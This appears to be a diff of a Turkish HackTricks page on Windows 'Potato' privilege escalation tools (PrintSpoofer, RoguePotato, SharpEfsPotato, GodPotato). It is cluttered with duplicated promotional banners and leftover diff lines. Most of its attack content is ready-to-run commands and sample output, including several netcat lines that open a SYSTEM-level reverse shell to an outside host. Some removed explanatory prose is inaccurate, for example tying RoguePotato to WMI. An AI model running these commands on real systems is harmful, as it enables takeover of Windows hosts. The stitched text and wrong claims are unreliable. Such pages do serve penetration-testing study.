Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* **Bir siber güvenlik şirketinde mi çalışıyorsunuz? Şirketinizi HackTricks'te reklamını görmek ister misiniz? ya da PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz? [**ABONELİK PLANLARI**'na](https://github.com/sponsors/carlospolop) göz atın!
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* **💬** [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya beni **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* **Bir siber güvenlik şirketinde mi çalışıyorsunuz? Şirketinizi HackTricks'te reklamını görmek ister misiniz? veya PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz? [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* **💬** [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya beni **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı göndererek** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **ve** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **üzerinden PR gönderin.**
</details>

View file

@ -2,20 +2,34 @@
<details>
<summary><strong>AWS hackleme becerilerinizi sıfırdan ileri seviyeye taşıyın</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile</strong>!</summary>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'u takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek paylaşın**.
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevsellikler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
{% hint style="warning" %}
**JuicyPotato**, Windows Server 2019 ve Windows 10 sürümü 1809'dan itibaren çalışmamaktadır. Bununla birlikte, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) aynı yetkileri kullanarak `NT AUTHORITY\SYSTEM` düzeyinde erişim sağlamak için kullanılabilir. Bu [blog yazısı](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/), JuicyPotato'nun artık çalışmadığı Windows 10 ve Server 2019 ana bilgisayarlarında sahtekarlık yetkilerini kötüye kullanmak için kullanılan `PrintSpoofer` aracına ayrıntılı bir şekilde değinmektedir.
**JuicyPotato**, Windows Server 2019 ve Windows 10 sürümü 1809'dan itibaren çalışmamaktadır. Ancak, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) aynı ayrıcalıkları kullanmak ve `NT AUTHORITY\SYSTEM` seviyesine erişmek için kullanılabilir. Bu [blog yazısı](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/), JuicyPotato'nun artık çalışmadığı Windows 10 ve Server 2019 ana bilgisayarlarında kimlik hırsızlığı ayrıcalıklarını kötüye kullanmak için kullanılabilecek `PrintSpoofer` aracına derinlemesine gider.
{% endhint %}
## Hızlı Demo
@ -35,57 +49,17 @@ c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"
NULL
```
RoguePotato, also known as Potato, is a Windows local privilege escalation technique that takes advantage of the Windows Management Instrumentation (WMI) service. It exploits a vulnerability in the WMI service to execute arbitrary code with SYSTEM privileges.
### RoguePotato
The technique involves creating a malicious WMI event consumer that runs a specified command or script. When the WMI service is restarted, it will execute the malicious code with SYSTEM privileges. This allows an attacker to escalate their privileges from a low-privileged user to SYSTEM, gaining full control over the compromised system.
RoguePotato can be used in combination with other techniques, such as PrintSpoofer, to achieve even higher privileges. It is important to note that RoguePotato requires administrative privileges to create the malicious WMI event consumer.
To mitigate the risk of RoguePotato, it is recommended to apply the latest security updates and patches to the affected systems. Additionally, restricting administrative privileges and implementing strong access controls can help prevent unauthorized access and privilege escalation.
{% code overflow="wrap" %}
```bash
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
```
{% code %}
{% endcode %}
### SharpEfsPotato
SharpEfsPotato is a tool that leverages the EfsRpcOpenFileRaw function to perform a Local Privilege Escalation (LPE) attack on Windows systems. This attack exploits the EFS (Encrypting File System) service to gain SYSTEM-level privileges.
#### Usage
To use SharpEfsPotato, follow these steps:
1. Compile the C# code using a .NET compiler.
2. Execute the compiled binary on the target Windows system.
#### Requirements
To successfully execute the attack, the following conditions must be met:
- The target system must have the EFS service enabled.
- The attacker must have local administrator privileges on the target system.
#### Attack Process
The attack process involves the following steps:
1. The attacker runs the SharpEfsPotato binary on the target system.
2. SharpEfsPotato creates a named pipe and waits for the EFS service to connect to it.
3. The attacker triggers the EFS service to connect to the named pipe.
4. SharpEfsPotato sends a specially crafted request to the EFS service, exploiting a vulnerability in the EfsRpcOpenFileRaw function.
5. The EFS service processes the request and executes the attacker's payload with SYSTEM-level privileges.
#### Mitigation
To mitigate the risk of this attack, consider the following measures:
- Disable the EFS service if it is not required.
- Regularly apply security updates and patches to the Windows system.
- Limit the privileges of user accounts to minimize the impact of a potential LPE attack.
{% endcode %}
```
SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
@ -104,15 +78,7 @@ df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
C:\temp>type C:\temp\w.log
nt authority\system
```
### GodPatatesi
GodPotato, Windows işletim sistemlerinde yerel ayrıcalık yükseltme saldırıları gerçekleştirmek için kullanılan bir araçtır. Bu araç, Windows işletim sistemlerindeki bir zayıflıktan yararlanarak, düşük ayrıcalıklı bir kullanıcı hesabından yüksek ayrıcalıklı bir hesaba erişim sağlar.
GodPotato, Windows işletim sistemlerindeki bir hizmetin güvenlik açıklarını kullanarak yerel ayrıcalık yükseltme saldırıları gerçekleştirir. Bu saldırılar, hedef sisteme düşük ayrıcalıklı bir kullanıcı hesabıyla erişim sağlayan bir saldırganın, hedef sistemin yüksek ayrıcalıklı bir hesabına erişim elde etmesini sağlar.
GodPotato, özellikle RoguePotato ve PrintSpoofer gibi diğer araçlarla birlikte kullanıldığında etkili bir şekilde çalışır. Bu araçlar, hedef sisteme erişim sağlamak ve ardından yerel ayrıcalık yükseltme saldırıları gerçekleştirmek için birlikte kullanılabilir.
GodPotato, Windows işletim sistemlerinde yerel ayrıcalık yükseltme saldırıları gerçekleştirmek isteyen pentester'lar ve güvenlik araştırmacıları için önemli bir araçtır. Bu araç, hedef sistemin güvenlik açıklarını tespit etmek ve ayrıcalık yükseltme saldırıları gerçekleştirmek için kullanılabilir.
### TanrıPatatesi
```
GodPotato -cmd "cmd /c whoami"
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
@ -124,16 +90,28 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize** edilip edilmediğini kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>